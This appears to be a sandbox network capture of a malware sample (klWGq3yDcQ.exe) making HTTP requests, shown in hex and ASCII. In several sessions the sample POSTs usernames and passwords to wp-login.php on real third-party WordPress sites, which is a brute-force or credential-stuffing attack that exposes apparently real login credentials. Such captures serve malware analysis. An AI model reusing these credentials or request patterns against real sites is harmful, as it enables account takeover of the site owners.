                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: site_version_phase=108; site_version=HDv3
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.hugedomains.com/domain_profile.cfm?d=robinsonland.com
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC641INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a 76 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 41 53 50 2e 4e 45 54 0d 0a 6c 62 3a 20 54 63 6c 50 72 64 4c 62 48 64 33 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closecache-control: privatevary: Accept-Encodingx-powered-by: ASP.NETlb: TclPrdLbHd3CF-Cache-Status: DYNAMICR
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC728INData Raw: 35 35 64 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 6f 6b 69 65 79 65 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 63 6f 6f 6b 69 65 79 65 73 2e 63 6f 6d 2f 63 6c 69 65 6e 74 5f 64 61 74 61 2f 65 37 31 62 63 35 33 66 31 63 62 38 38 36 36 36 64 31 36 30 63 31 65 32 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65
                                                                                                                                                                                                    Data Ascii: 55db<!DOCTYPE html><html lang="en"><head><script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/e71bc53f1cb88666d160c1e2/script.js"></script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC1369INData Raw: 2f 68 64 76 33 2d 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 68 64 2d 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 32 2d 31 30 2d 33 33 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                                                                                                                                                                    Data Ascii: /hdv3-css/style.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/responsive.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/hd-style.css?aa=2022-10-33"><meta name=
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC1369INData Raw: 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 37 31 31 37 33 33 39 2d 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0d 0a 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0d 0a 2f 2a 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 55 41 2d 37 31 31 37 33 33 39 2d 34 27 29 3b 20 2a 2f 0d 0a 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 55 41 2d 37 31 31 37 33 33 39 2d 34 27 2c 20 7b 0d 0a 27 63 75 73 74 6f 6d 5f 6d 61 70 27 3a 20 7b 0d 0a 27 64 69 6d 65 6e 73
                                                                                                                                                                                                    Data Ascii: tag/js?id=UA-7117339-4"></script><script>window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}gtag('js', new Date());/* gtag('config', 'UA-7117339-4'); */gtag('config', 'UA-7117339-4', {'custom_map': {'dimens
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC1369INData Raw: 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 42 6f 78 44 69 76 49 44 22 3e 0a 0a 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 73 65 61 72 63 68 2e 63 66 6d 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 66 6f 72 6d 22 20 69 64 3d 22 73 69 74 65 48 65 61 64 65 72 46 6f 72 6d 53 65 61 72 63 68 49 44 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 64 6f 6d 61 69 6e 5f 6e 61 6d 65 22 20 76 61 6c 75 65 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 69 6e 70 75 74 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 54 65 78 74 49 44 22 20 61 72 69 61 2d 6c 61
                                                                                                                                                                                                    Data Ascii: id="hdv3HeaderSearchBoxDivID"><form action="https://www.HugeDomains.com/domain_search.cfm" method="get" class="search-form" id="siteHeaderFormSearchID"><input type="text" name="domain_name" value class="search-input" id="hdv3HeaderSearchTextID" aria-la
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC1369INData Raw: 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 68 51 51 51 69 64 65 41 74 39 39 31 57 69 64 74 68 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 44 72 61 77 65 72 4c 61 79 20 22 20 6f 6e 63 6c 69 63 6b 3d 22 20 24 28 20 27 23 6e 61 76 54 6f 67 67 6c 65 27 20 29 2e 63 6c 69 63 6b 28 29 3b 20 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 4d 65 6e 75 20 64 2d 66 6c 65 78 20 61 69 2d 63 65 6e 74 65 72 20 6a 63 2d 62 65 74 77 65 65 6e 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 6e 61 76 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 3c 61 20 63 6c 61 73 73
                                                                                                                                                                                                    Data Ascii: iv></div><nav class="navbar hQQQideAt991Width"><div class="overDrawerLay " onclick=" $( '#navToggle' ).click(); "></div><div class="overlay "><div class="overlayMenu d-flex ai-center jc-between"><ul class="navbar-nav"><li class="nav-item"><a class
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC1369INData Raw: 72 69 61 2d 6c 61 62 65 6c 3d 22 53 68 6f 70 70 69 6e 67 20 43 61 72 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 6f 62 69 6c 65 2d 73 68 6f 77 22 3e 53 68 6f 70 70 69 6e 67 20 63 61 72 74 3c 2f 73 70 61 6e 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 63 61 72 74 2e 70 6e 67 22 20 61 6c 74 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 61 72 74 2d 6e 75 6d 62 65 72 20 68 69 64 64 65 6e 41 74 4c 6f 61 64 22 20 69 64 3d 22 68 64 76 33 43 61 72 74 4e 75 6d 62 65 72 53 70 61 6e 49 44 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6e 61 76 3e 0a 3c
                                                                                                                                                                                                    Data Ascii: ria-label="Shopping Cart"><span class="mobile-show">Shopping cart</span><img src="https://static.HugeDomains.com/images/hdv3-img/cart.png" alt><span class="cart-number hiddenAtLoad" id="hdv3CartNumberSpanID"></span></a></div></div></div></div></nav><
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC1369INData Raw: 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 33 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 34 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 35 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 36 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 37 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 38 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6f 72 22 3e 6f 72 3c 2f 73 70 61 6e 3e 0a 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77
                                                                                                                                                                                                    Data Ascii: div class="circularJ_3"></div><div class="circularJ_4"></div><div class="circularJ_5"></div><div class="circularJ_6"></div><div class="circularJ_7"></div><div class="circularJ_8"></div></div></button><span class="or">or</span><a href="https://ww
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC1369INData Raw: 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 33 30 64 61 79 73 6d 61 6c 6c 69 63 6f 2e 70 6e 67 22 20 61 6c 74 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 3e 33 30 2d 64 61 79 20 6d 6f 6e 65 79 20 62 61 63 6b 20 67 75 61 72 61 6e 74 65 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 72 6f 6b 65 74 2d 73 69 64 65 2d 69 63 6f
                                                                                                                                                                                                    Data Ascii: g src="https://static.HugeDomains.com/images/hdv3-img/30daysmallico.png" alt></div><div class="content"><span>30-day money back guarantee</span></div></li><li><div class="img"><img src="https://static.HugeDomains.com/images/hdv3-img/roket-side-ico
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC1369INData Raw: 65 6e 22 3e 24 32 2c 34 39 35 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 73 22 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 42 75 79 20 6e 6f 77 20 66 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 32 2c 34 39 35 3c 2f 73 70 61 6e 3e 20 6f 72 20 70 61 79 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 32 30 37 2e 39 32 3c 2f 73 70 61 6e 3e 20 70 65 72 20 6d 6f 6e 74 68 20 66 6f 72 20 31 32 20 6d 6f 6e 74 68 73 3c 2f 70 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 72 6f 77 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 6c
                                                                                                                                                                                                    Data Ascii: en">$2,495</span></p></div><div class="tablet-block-s"><p class="text-center">Buy now for <span class="green">$2,495</span> or pay <span class="green">$207.92</span> per month for 12 months</p><div class="tablet-block-row"><div class="tablet-block-l


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    231192.168.2.46110272.167.58.1614436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC213OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: webstamp.ca
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://webstamp.ca/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC275INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 75 70 67 72 61 64 65 2d 69 6e 73 65 63 75 72 65 2d 72 65 71 75 65 73 74 73 3b 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:39 GMTServer: ApacheContent-Security-Policy: upgrade-insecure-requests;Upgrade: h2,h2cConnection: Upgrade, closeAccept-Ranges: bytesVary: Accept-EncodingTransfer-Encoding: chunkedContent
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC646INData Raw: 32 37 61 0d 0a 2f 77 70 2d 61 64 6d 69 6e 2f 4f 4f 50 53 21 20 53 6f 6d 65 74 68 69 6e 67 20 77 65 6e 74 20 77 72 6f 6e 67 2e 20 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 68 61 73 20 62 65 65 6e 20 0d 0a 72 65 6d 6f 76 65 64 20 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 64 65 72 20 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 0d 0a 46 65 65 6c 20 66 72 65 65 20 74 6f 20 72 65 61 64 20 74 68 65 20 6d 61 6e 79 20 6f 74 68 65 72 20 61 72 74 69 63 6c 65 73 20 61 76 61 69 6c 61 62 6c 65 20 61 74 20 0d 0a 68 74 74 70 73 3a 2f 2f 77 65 62 73 74 61 6d 70 2e 63 61 0d 0a 3c 21 2d 2d 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: 27a/wp-admin/OOPS! Something went wrong. The page you requested has been removed or is currently under maintenance.Feel free to read the many other articles available at https://webstamp.ca...


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    232192.168.2.461186172.96.186.2064436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC330OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: samson.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP+Cookie+check
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://samson.pe/wp-login.php
                                                                                                                                                                                                    Content-Length: 141
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC141OUTData Raw: 6c 6f 67 3d 6a 6d 61 6c 64 6f 6e 61 64 6f 26 70 77 64 3d 37 31 32 33 73 61 6d 73 6f 6e 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 49 6e 69 63 69 61 72 2b 73 65 73 69 25 43 33 25 42 33 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 73 61 6d 73 6f 6e 2e 70 65 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=jmaldonado&pwd=7123samson&rememberme=forever&wp-submit=Iniciar+sesi%C3%B3n&redirect_to=https%3A%2F%2Fsamson.pe%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC555INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 37 2e 32 2e 33 34 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 2b 43 6f 6f 6b 69 65 2b 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKConnection: closex-powered-by: PHP/7.2.34expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; s
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC813INData Raw: 32 34 33 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 50 45 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 49 6e 69 63 69 61 72 20 73 65 73 69 c3 b3 6e 20 26 6c 73 61 71 75 6f 3b 20 53 61 6d 73 6f 6e 20 43 6f 6e 74 72 6f 6c 73 20 50 65 72 c3 ba 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 21
                                                                                                                                                                                                    Data Ascii: 2432<!DOCTYPE html><html lang="es-PE"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Iniciar sesin &lsaquo; Samson Controls Per &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><!
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC8461INData Raw: 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 6f 67 69 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 61 6d 73 6f 6e 2e 70 65 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 6f 67 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 53 69 74 65 20 4b 69 74 20 62 79 20 47 6f 6f 67 6c 65 20 31 2e 31 31 34 2e 30 22 20 2f 3e 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 65 66 65 72 72 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 27 20 2f 3e 0a 09 09
                                                                                                                                                                                                    Data Ascii: l='stylesheet' id='login-css' href='https://samson.pe/wp-admin/css/login.min.css?ver=6.4.1' type='text/css' media='all' /><meta name="generator" content="Site Kit by Google 1.114.0" /><meta name='referrer' content='strict-origin-when-cross-origin' />
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    233192.168.2.461317162.210.96.1174436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC398OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: coralparkchristian.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=7mfvhmb4mfea9682fccpeuhhfb
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://coralparkchristian.org/wp-login.php
                                                                                                                                                                                                    Content-Length: 140
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC140OUTData Raw: 6c 6f 67 3d 6d 61 69 6e 6f 66 66 69 63 65 26 70 77 64 3d 54 30 4a 52 58 34 57 54 53 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 63 6f 72 61 6c 70 61 72 6b 63 68 72 69 73 74 69 61 6e 2e 6f 72 67 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=mainoffice&pwd=T0JRX4WTS&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fcoralparkchristian.org%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC522INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 72 2d 63 66 2d 6c 69 73 74 5f 65 6d 61 69 6c 5f 73 65 6e 64 5f 74 6f 3d 64 65 6c 65 74 65 64 3b
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:39 GMTServer: ApachePragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wr-cf-list_email_send_to=deleted;
